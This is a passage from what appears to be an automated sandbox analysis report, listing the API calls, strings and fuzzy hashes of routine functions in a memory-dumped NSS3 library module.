                                                                                                                                                                                                                                                            • __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000001,?,6BF1444C,00000000,00000000,00000000,?,6BED7F7C,6BED80DD), ref: 6BEFCBAE
                                                                                                                                                                                                                                                            • fputc.API-MS-WIN-CRT-STDIO-L1-1-0(0000000A,00000000,?,?,?,?,?,?,?,?,?,6BF1444C,00000000,00000000,00000000), ref: 6BEFCBE6
                                                                                                                                                                                                                                                            • PR_IntervalToMicroseconds.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,6BF1444C,00000000,00000000,00000000), ref: 6BEFCC37
                                                                                                                                                                                                                                                            • PR_IntervalToMilliseconds.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,?,6BF1444C,00000000,00000000), ref: 6BEFCCA4
                                                                                                                                                                                                                                                            • fputc.API-MS-WIN-CRT-STDIO-L1-1-0(0000000A,00000000), ref: 6BEFCD84
                                                                                                                                                                                                                                                            • fputc.API-MS-WIN-CRT-STDIO-L1-1-0(0000000A,00000000,?,?,?,?,?,?,?,?,?,?,?,?,6BF1444C,00000000), ref: 6BEFCDA6
                                                                                                                                                                                                                                                            • PR_IntervalToMilliseconds.NSS3(6BF1444C,?,?,?,?,?,?,?,?,?,?,?,?,?,?,6BF1444C), ref: 6BEFCE02
                                                                                                                                                                                                                                                            • fflush.API-MS-WIN-CRT-STDIO-L1-1-0(00000000), ref: 6BEFCE59
                                                                                                                                                                                                                                                            • __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000001), ref: 6BEFCE64
                                                                                                                                                                                                                                                            • fclose.API-MS-WIN-CRT-STDIO-L1-1-0(00000000), ref: 6BEFCE72
                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2511612890.000000006BE41000.00000020.00000001.01000000.00000019.sdmp, Offset: 6BE40000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2511512802.000000006BE40000.00000002.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2512609278.000000006BFDF000.00000002.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2512786299.000000006C01E000.00000004.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2512952713.000000006C01F000.00000008.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2513057814.000000006C020000.00000004.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2513132719.000000006C025000.00000002.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_6be40000_3m20j.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: Intervalfputc$Milliseconds__acrt_iob_func$CriticalEnterMicrosecondsSectionSecureUnlockValuefclosefflushfopengetenv
                                                                                                                                                                                                                                                            • String ID: Maximum number of concurrent open sessions: %d$# Calls$% Time$%-25s %10d %10d%2s $%-25s %10s %12s %12s %10s$%25s %10d %10d%2s$Avg.$Function$NSS_OUTPUT_FILE$Totals
                                                                                                                                                                                                                                                            • API String ID: 2795105899-3917921256
                                                                                                                                                                                                                                                            • Opcode ID: d8bc0d40e79a50e3ec382b7e9d733e61e269329dd7b8ec612aee31d54398f85a
                                                                                                                                                                                                                                                            • Instruction ID: 8337944a2098542a9833afc79d2f9f3196e186c3885223f8119652d534347624
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: d8bc0d40e79a50e3ec382b7e9d733e61e269329dd7b8ec612aee31d54398f85a
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: DB716B73F002415BCB019B789C46A2EB67D9F96348F74462AE50976361FB3DC4A3C2A2
                                                                                                                                                                                                                                                            Function 6BF06910 Relevance: 38.6, APIs: 15, Strings: 7, Instructions: 131COMMON
                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            • NSSUTIL_ArgHasFlag.NSS3(flags,readOnly,00000000), ref: 6BF06943
                                                                                                                                                                                                                                                              • Part of subcall function 6BF24210: strlen.API-MS-WIN-CRT-STRING-L1-1-0(?,36003739,flags,?,00000000,?,6BF05947,flags,printPolicyFeedback,?,?,?,?,?,?,00000000), ref: 6BF24220
                                                                                                                                                                                                                                                              • Part of subcall function 6BF24210: NSSUTIL_ArgGetParamValue.NSS3(?,6BF05947,?,?,?,?,?,?,00000000,?,00000000,?,6BF07703,?,00000000,00000000), ref: 6BF2422D
                                                                                                                                                                                                                                                              • Part of subcall function 6BF24210: PL_strncasecmp.NSS3(00000000,?,?,?,?,?,?,?,?,?,?,00000000,?,00000000,?,6BF07703), ref: 6BF2424B
                                                                                                                                                                                                                                                              • Part of subcall function 6BF24210: free.MOZGLUE(00000000,?,?,?,?,?,?,?,?,00000000,?,00000000,?,6BF07703,?,00000000), ref: 6BF24272
                                                                                                                                                                                                                                                            • NSSUTIL_ArgHasFlag.NSS3(flags,nocertdb,00000000), ref: 6BF06957
                                                                                                                                                                                                                                                            • NSSUTIL_ArgHasFlag.NSS3(flags,nokeydb,00000000), ref: 6BF06972
                                                                                                                                                                                                                                                            • NSSUTIL_ArgStrip.NSS3(00000000), ref: 6BF06983
                                                                                                                                                                                                                                                              • Part of subcall function 6BF23EA0: isspace.API-MS-WIN-CRT-STRING-L1-1-0(8914C483,70E85609,6BEFC79F,?,6BF06247,70E85609,?,?,6BEFC79F,6BF0781D,?,6BEFBD52,00000001,70E85609,D85D8B04,?), ref: 6BF23EB8
                                                                                                                                                                                                                                                            • PL_strncasecmp.NSS3(00000000,configdir=,0000000A), ref: 6BF069AA
                                                                                                                                                                                                                                                            • PL_strncasecmp.NSS3(00000000,certPrefix=,0000000B), ref: 6BF069BE
                                                                                                                                                                                                                                                            • PL_strncasecmp.NSS3(00000000,keyPrefix=,0000000A), ref: 6BF069D2
                                                                                                                                                                                                                                                            • NSSUTIL_ArgSkipParameter.NSS3(00000000), ref: 6BF069DF
                                                                                                                                                                                                                                                              • Part of subcall function 6BF24020: isspace.API-MS-WIN-CRT-STRING-L1-1-0(FFFFEF69,00000000,?,?,766B4C80,?,6BF250B7,?), ref: 6BF24041
                                                                                                                                                                                                                                                            • free.MOZGLUE(00000000), ref: 6BF069F6
                                                                                                                                                                                                                                                            • NSSUTIL_ArgFetchValue.NSS3(-0000000A,?), ref: 6BF06A04
                                                                                                                                                                                                                                                            • free.MOZGLUE(00000000), ref: 6BF06A1B
                                                                                                                                                                                                                                                            • NSSUTIL_ArgFetchValue.NSS3(-0000000B,?), ref: 6BF06A29
                                                                                                                                                                                                                                                            • free.MOZGLUE(00000000), ref: 6BF06A3F
                                                                                                                                                                                                                                                            • NSSUTIL_ArgFetchValue.NSS3(-0000000A,?), ref: 6BF06A4D
                                                                                                                                                                                                                                                            • NSSUTIL_ArgStrip.NSS3(?), ref: 6BF06A5B
                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2511612890.000000006BE41000.00000020.00000001.01000000.00000019.sdmp, Offset: 6BE40000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2511512802.000000006BE40000.00000002.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2512609278.000000006BFDF000.00000002.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2512786299.000000006C01E000.00000004.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2512952713.000000006C01F000.00000008.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2513057814.000000006C020000.00000004.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2513132719.000000006C025000.00000002.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_6be40000_3m20j.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: L_strncasecmpValuefree$FetchFlag$Stripisspace$ParamParameterSkipstrlen
                                                                                                                                                                                                                                                            • String ID: certPrefix=$configdir=$flags$keyPrefix=$nocertdb$nokeydb$readOnly
                                                                                                                                                                                                                                                            • API String ID: 2065226673-2785624044
                                                                                                                                                                                                                                                            • Opcode ID: e17b1d7c040d1d444a5c717719af53054fd2fac99dc4619df2daf167d1add3c3
                                                                                                                                                                                                                                                            • Instruction ID: 4656328a65f322f6d14a73f2a32863963443fb80231cf5728886e152e160d8e6
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: e17b1d7c040d1d444a5c717719af53054fd2fac99dc4619df2daf167d1add3c3
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 6E4144F7E002066BE700DBB5AC92B5BB7AC9F15248F044434F909E6272FB3DDA5496A1
                                                                                                                                                                                                                                                            Function 6BEF08F0 Relevance: 33.5, APIs: 13, Strings: 6, Instructions: 230COMMON
                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            • htonl.WSOCK32(-00000001,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000001), ref: 6BEF094D
                                                                                                                                                                                                                                                            • htonl.WSOCK32(-00000001,-00000001,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6BEF0953
                                                                                                                                                                                                                                                            • htonl.WSOCK32(-00000001,-00000001,-00000001), ref: 6BEF096E
                                                                                                                                                                                                                                                            • htonl.WSOCK32(-00000001,-00000001,-00000001,-00000001), ref: 6BEF0974
                                                                                                                                                                                                                                                            • htonl.WSOCK32(-00000001,-00000001,-00000001,-00000001,-00000001), ref: 6BEF098F
                                                                                                                                                                                                                                                            • htonl.WSOCK32(-00000001,-00000001,-00000001,-00000001,-00000001,-00000001), ref: 6BEF0995
                                                                                                                                                                                                                                                              • Part of subcall function 6BEF1800: SECITEM_AllocItem_Util.NSS3(00000000,00000000,?), ref: 6BEF1860
                                                                                                                                                                                                                                                              • Part of subcall function 6BEF1800: memcpy.VCRUNTIME140(?,?,?,?,?,?,?,?,?,?,?,00000000,?,-00000001,?,6BEF09BF), ref: 6BEF1897
                                                                                                                                                                                                                                                              • Part of subcall function 6BEF1800: memcpy.VCRUNTIME140(?,-00000001,-00000001,?,?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 6BEF18AA
                                                                                                                                                                                                                                                              • Part of subcall function 6BEF1800: memcpy.VCRUNTIME140(?,?,?), ref: 6BEF18C4
                                                                                                                                                                                                                                                            • PK11_FreeSymKey.NSS3(00000000,?,?,?,?,?,?,?,-00000001,-00000001,-00000001,-00000001), ref: 6BEF0B4F
                                                                                                                                                                                                                                                            • SECITEM_ZfreeItem_Util.NSS3(?,00000000,?,?,?,?,?,?,?,?,-00000001,-00000001,-00000001,-00000001), ref: 6BEF0B5E
                                                                                                                                                                                                                                                            • SECITEM_ZfreeItem_Util.NSS3(?,00000001,?,?,?,?,?,?,?,?,?,?,-00000001,-00000001,-00000001,-00000001), ref: 6BEF0B6B
                                                                                                                                                                                                                                                            • SECITEM_ZfreeItem_Util.NSS3(?,00000001,?,?,?,?,?,?,?,?,?,?,?,?,-00000001,-00000001), ref: 6BEF0B78
                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2511612890.000000006BE41000.00000020.00000001.01000000.00000019.sdmp, Offset: 6BE40000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2511512802.000000006BE40000.00000002.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2512609278.000000006BFDF000.00000002.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2512786299.000000006C01E000.00000004.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2512952713.000000006C01F000.00000008.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2513057814.000000006C020000.00000004.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2513132719.000000006C025000.00000002.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_6be40000_3m20j.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: htonl$Item_Util$Zfreememcpy$AllocFreeK11_
                                                                                                                                                                                                                                                            • String ID: base_nonce$exp$info_hash$key$psk_id_hash$secret
                                                                                                                                                                                                                                                            • API String ID: 1637529542-763765719
                                                                                                                                                                                                                                                            • Opcode ID: 4497a7fe1f8f6b8c4172a4b3b2bb9951e332007329eaf362cab8805313f171d8
                                                                                                                                                                                                                                                            • Instruction ID: a4070d15e028865124faac6550f810b7abac1d76d53f43638444d8becb45c964
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 4497a7fe1f8f6b8c4172a4b3b2bb9951e332007329eaf362cab8805313f171d8
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: D1818A76604306AFC700CF64C88195AF7E9FF8C708F048919F99897362E735E916CB92
                                                                                                                                                                                                                                                            Function 6BEDAB90 Relevance: 33.4, APIs: 22, Instructions: 388COMMON
                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2511612890.000000006BE41000.00000020.00000001.01000000.00000019.sdmp, Offset: 6BE40000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2511512802.000000006BE40000.00000002.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2512609278.000000006BFDF000.00000002.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2512786299.000000006C01E000.00000004.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2512952713.000000006C01F000.00000008.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2513057814.000000006C020000.00000004.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2513132719.000000006C025000.00000002.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_6be40000_3m20j.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: Value$CriticalEnterSection$CondUnlockWait
                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                            • API String ID: 839227765-0
                                                                                                                                                                                                                                                            • Opcode ID: f12a3ea181b05145fdc021e38e25dd1accb9a8b9dec0313b9293b4201febada5
                                                                                                                                                                                                                                                            • Instruction ID: 580306c3a2a243a650c59f73e09f85a75405701e1b72e79978c156a8a00198fe
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: f12a3ea181b05145fdc021e38e25dd1accb9a8b9dec0313b9293b4201febada5
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 38F1AEB0A44701CFEB10AF78C185759BBF0BF05308F2099ADD99987351EB78E996CB81
                                                                                                                                                                                                                                                            Function 6BF03B30 Relevance: 33.4, APIs: 22, Instructions: 368COMMON
                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            • TlsGetValue.KERNEL32 ref: 6BF03B90
                                                                                                                                                                                                                                                            • EnterCriticalSection.KERNEL32(0000001D), ref: 6BF03BA4
                                                                                                                                                                                                                                                            • TlsGetValue.KERNEL32 ref: 6BF03DC5
                                                                                                                                                                                                                                                            • EnterCriticalSection.KERNEL32(0000001D), ref: 6BF03DD9
                                                                                                                                                                                                                                                              • Part of subcall function 6BEB07A0: TlsGetValue.KERNEL32(00000000,?,?,?,?,6BE4204A), ref: 6BEB07AD
                                                                                                                                                                                                                                                              • Part of subcall function 6BEB07A0: TlsSetValue.KERNEL32(00000000,?,?,?,?,6BE4204A), ref: 6BEB07CD
                                                                                                                                                                                                                                                              • Part of subcall function 6BEB07A0: TlsSetValue.KERNEL32(00000000,?,?,?,?,6BE4204A), ref: 6BEB07D6
                                                                                                                                                                                                                                                              • Part of subcall function 6BEB07A0: calloc.MOZGLUE(00000001,00000144,?,?,?,?,6BE4204A), ref: 6BEB07E4
                                                                                                                                                                                                                                                              • Part of subcall function 6BEB07A0: TlsSetValue.KERNEL32(00000000,?,6BE4204A), ref: 6BEB0864
                                                                                                                                                                                                                                                              • Part of subcall function 6BEB07A0: calloc.MOZGLUE(00000001,0000002C), ref: 6BEB0880
                                                                                                                                                                                                                                                              • Part of subcall function 6BEB07A0: TlsSetValue.KERNEL32(00000000,?,?,6BE4204A), ref: 6BEB08CB
                                                                                                                                                                                                                                                              • Part of subcall function 6BEB07A0: TlsGetValue.KERNEL32(?,?,6BE4204A), ref: 6BEB08D7
                                                                                                                                                                                                                                                              • Part of subcall function 6BEB07A0: TlsGetValue.KERNEL32(?,?,6BE4204A), ref: 6BEB08FB
                                                                                                                                                                                                                                                            • PR_Unlock.NSS3(00000001), ref: 6BF03E13
                                                                                                                                                                                                                                                            • PR_SetError.NSS3(00000000,00000000), ref: 6BF03E2B
                                                                                                                                                                                                                                                            • PR_Unlock.NSS3(?), ref: 6BF03E99
                                                                                                                                                                                                                                                            • TlsGetValue.KERNEL32 ref: 6BF03EBC
                                                                                                                                                                                                                                                            • EnterCriticalSection.KERNEL32(0000001C), ref: 6BF03ED4
                                                                                                                                                                                                                                                            • PR_Unlock.NSS3(?), ref: 6BF03EFF
                                                                                                                                                                                                                                                            • PR_SetError.NSS3(00000000,00000000), ref: 6BF03BEB
                                                                                                                                                                                                                                                              • Part of subcall function 6BF6C2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6BF6C2BF
                                                                                                                                                                                                                                                            • PR_Unlock.NSS3(?), ref: 6BF03D7B
                                                                                                                                                                                                                                                            • PR_Unlock.NSS3(00000001), ref: 6BF03BCF
                                                                                                                                                                                                                                                              • Part of subcall function 6BF6DD70: TlsGetValue.KERNEL32 ref: 6BF6DD8C
                                                                                                                                                                                                                                                              • Part of subcall function 6BF6DD70: LeaveCriticalSection.KERNEL32(00000000), ref: 6BF6DDB4
                                                                                                                                                                                                                                                            • TlsGetValue.KERNEL32(?,?,?,?,?,?,?,?,?,?,?), ref: 6BF03C23
                                                                                                                                                                                                                                                            • EnterCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?), ref: 6BF03C37
                                                                                                                                                                                                                                                            • PR_Unlock.NSS3(?), ref: 6BF03C78
                                                                                                                                                                                                                                                            • TlsGetValue.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6BF03C96
                                                                                                                                                                                                                                                            • EnterCriticalSection.KERNEL32(?), ref: 6BF03CAA
                                                                                                                                                                                                                                                            • PR_Unlock.NSS3(?), ref: 6BF03D13
                                                                                                                                                                                                                                                            • TlsGetValue.KERNEL32 ref: 6BF03D37
                                                                                                                                                                                                                                                            • EnterCriticalSection.KERNEL32(0000001C), ref: 6BF03D4F
                                                                                                                                                                                                                                                            • PR_SetError.NSS3(FFFFE028,00000000,?,?,?,?,?,?,?,?,?,?,?), ref: 6BF03F1C
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2511612890.000000006BE41000.00000020.00000001.01000000.00000019.sdmp, Offset: 6BE40000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2511512802.000000006BE40000.00000002.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2512609278.000000006BFDF000.00000002.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2512786299.000000006C01E000.00000004.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2512952713.000000006C01F000.00000008.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2513057814.000000006C020000.00000004.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2513132719.000000006C025000.00000002.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_6be40000_3m20j.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: Value$CriticalSectionUnlock$Enter$Error$calloc$Leave
                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                            • API String ID: 186629115-0
                                                                                                                                                                                                                                                            • Opcode ID: 90641d6dcf32ad26e5420d0bc0c6fb2ff584c7a9ce131d5d0c71186cc781040a
                                                                                                                                                                                                                                                            • Instruction ID: ac3c5643c7cf3b4b368314521649c8508cb82727ab2e9150659ac1c0adadc4ff
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 90641d6dcf32ad26e5420d0bc0c6fb2ff584c7a9ce131d5d0c71186cc781040a
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: D5E1BE76D00209EFDF10AFA4D895B9DBBB4BF09318F144168EC04A7221EB39E994CBD0
                                                                                                                                                                                                                                                            Function 6BF2C980 Relevance: 33.3, APIs: 22, Instructions: 298memoryCOMMON
                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            • PORT_NewArena_Util.NSS3(00000400,6BF2AEB0,?,00000004,00000001,?,00000000,?,?), ref: 6BF2C98E
                                                                                                                                                                                                                                                              • Part of subcall function 6BF20FF0: calloc.MOZGLUE(00000001,00000024,00000000,?,?,6BEC87ED,00000800,6BEBEF74,00000000), ref: 6BF21000
                                                                                                                                                                                                                                                              • Part of subcall function 6BF20FF0: PR_NewLock.NSS3(?,00000800,6BEBEF74,00000000), ref: 6BF21016
                                                                                                                                                                                                                                                              • Part of subcall function 6BF20FF0: PL_InitArenaPool.NSS3(00000000,security,6BEC87ED,00000008,?,00000800,6BEBEF74,00000000), ref: 6BF2102B
                                                                                                                                                                                                                                                            • PORT_ArenaAlloc_Util.NSS3(00000000,00000028,?,6BF2AEB0,?,00000004,00000001,?,00000000,?,?), ref: 6BF2C9A1
                                                                                                                                                                                                                                                              • Part of subcall function 6BF210C0: TlsGetValue.KERNEL32(?,6BEC8802,00000000,00000008,?,6BEBEF74,00000000), ref: 6BF210F3
                                                                                                                                                                                                                                                              • Part of subcall function 6BF210C0: EnterCriticalSection.KERNEL32(?,?,6BEC8802,00000000,00000008,?,6BEBEF74,00000000), ref: 6BF2110C
                                                                                                                                                                                                                                                              • Part of subcall function 6BF210C0: PL_ArenaAllocate.NSS3(?,?,?,6BEC8802,00000000,00000008,?,6BEBEF74,00000000), ref: 6BF21141
                                                                                                                                                                                                                                                              • Part of subcall function 6BF210C0: PR_Unlock.NSS3(?,?,?,6BEC8802,00000000,00000008,?,6BEBEF74,00000000), ref: 6BF21182
                                                                                                                                                                                                                                                              • Part of subcall function 6BF210C0: TlsGetValue.KERNEL32(?,6BEC8802,00000000,00000008,?,6BEBEF74,00000000), ref: 6BF2119C
                                                                                                                                                                                                                                                            • SECOID_FindOIDByTag_Util.NSS3(0000001A,?,?,?,6BF2AEB0,?,00000004,00000001,?,00000000,?,?), ref: 6BF2C9D3
                                                                                                                                                                                                                                                              • Part of subcall function 6BF20840: PR_SetError.NSS3(FFFFE08F,00000000), ref: 6BF208B4
                                                                                                                                                                                                                                                            • SECITEM_CopyItem_Util.NSS3(00000000,-00000018,00000000,?,?,?,?,6BF2AEB0,?,00000004,00000001,?,00000000,?,?), ref: 6BF2C9E6
                                                                                                                                                                                                                                                              • Part of subcall function 6BF1FB60: PORT_ArenaAlloc_Util.NSS3(00000000,E0056800,00000000,?,?,6BF18D2D,?,00000000,?), ref: 6BF1FB85
                                                                                                                                                                                                                                                              • Part of subcall function 6BF1FB60: memcpy.VCRUNTIME140(00000000,6A1BEBC6,E0056800,?), ref: 6BF1FBB1
                                                                                                                                                                                                                                                            • PORT_FreeArena_Util.NSS3(00000000,00000000,?,?,?,6BF2AEB0,?,00000004,00000001,?,00000000,?,?), ref: 6BF2C9F5
                                                                                                                                                                                                                                                            • PORT_ArenaAlloc_Util.NSS3(00000000,00000050,?,?,?,?,?,?,?,6BF2AEB0,?,00000004,00000001,?,00000000,?), ref: 6BF2CA0A
                                                                                                                                                                                                                                                            • SEC_ASN1EncodeInteger_Util.NSS3(00000000,00000000,00000001,?,?,?,?,?,?,?,?,?,6BF2AEB0,?,00000004,00000001), ref: 6BF2CA33
                                                                                                                                                                                                                                                            • SECOID_FindOIDByTag_Util.NSS3(00000019,?,?,?,?,?,?,?,?,?,?,?,?,6BF2AEB0,?,00000004), ref: 6BF2CA4D
                                                                                                                                                                                                                                                            • SECITEM_CopyItem_Util.NSS3(00000001,?,00000000), ref: 6BF2CA60
                                                                                                                                                                                                                                                            • SEC_PKCS7DestroyContentInfo.NSS3(00000000,?,?,?,?,?,?,?,?,?,?,?,?,6BF2AEB0,?,00000004), ref: 6BF2CA6D
                                                                                                                                                                                                                                                            • PR_Now.NSS3 ref: 6BF2CAD6
                                                                                                                                                                                                                                                            • PORT_ArenaMark_Util.NSS3(00000000), ref: 6BF2CB23
                                                                                                                                                                                                                                                            • PORT_ArenaAlloc_Util.NSS3(00000000,0000005C), ref: 6BF2CB32
                                                                                                                                                                                                                                                            • SEC_ASN1EncodeInteger_Util.NSS3(00000000,00000000,00000001), ref: 6BF2CB64
                                                                                                                                                                                                                                                            • SECOID_SetAlgorithmID_Util.NSS3(00000000,?,00000001,00000000), ref: 6BF2CBBB
                                                                                                                                                                                                                                                            • PORT_ArenaAlloc_Util.NSS3(?,00000008), ref: 6BF2CBD0
                                                                                                                                                                                                                                                            • PORT_ArenaAlloc_Util.NSS3(00000000,00000018), ref: 6BF2CBF6
                                                                                                                                                                                                                                                            • PORT_ArenaAlloc_Util.NSS3(00000000,00000008), ref: 6BF2CC18
                                                                                                                                                                                                                                                            • SECOID_SetAlgorithmID_Util.NSS3(00000000,00000000,00000001,00000000), ref: 6BF2CC39
                                                                                                                                                                                                                                                            • PORT_ArenaAlloc_Util.NSS3(00000000,0000000C), ref: 6BF2CC5B
                                                                                                                                                                                                                                                              • Part of subcall function 6BF210C0: PL_ArenaAllocate.NSS3(?,6BEC8802,00000000,00000008,?,6BEBEF74,00000000), ref: 6BF2116E
                                                                                                                                                                                                                                                            • PORT_ArenaAlloc_Util.NSS3(00000000,00000008), ref: 6BF2CC69
                                                                                                                                                                                                                                                            • SECITEM_CopyItem_Util.NSS3(00000000,?,00000000), ref: 6BF2CC89
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2511612890.000000006BE41000.00000020.00000001.01000000.00000019.sdmp, Offset: 6BE40000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2511512802.000000006BE40000.00000002.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2512609278.000000006BFDF000.00000002.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2512786299.000000006C01E000.00000004.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2512952713.000000006C01F000.00000008.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2513057814.000000006C020000.00000004.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2513132719.000000006C025000.00000002.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_6be40000_3m20j.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: Util$Arena$Alloc_$CopyItem_$AlgorithmAllocateArena_EncodeFindInteger_Tag_Value$ContentCriticalDestroyEnterErrorFreeInfoInitLockMark_PoolSectionUnlockcallocmemcpy
                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                            • API String ID: 1766420342-0
                                                                                                                                                                                                                                                            • Opcode ID: 6f9fcd7fbf13d72d5fe9a1e7be57855574823472cb8fd11c648aaba98c8cffc4
                                                                                                                                                                                                                                                            • Instruction ID: ca68fc58140e4f1e7b425f5ca49cb66a1a477ea7e2dec218dafdab199a7bad69
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 6f9fcd7fbf13d72d5fe9a1e7be57855574823472cb8fd11c648aaba98c8cffc4
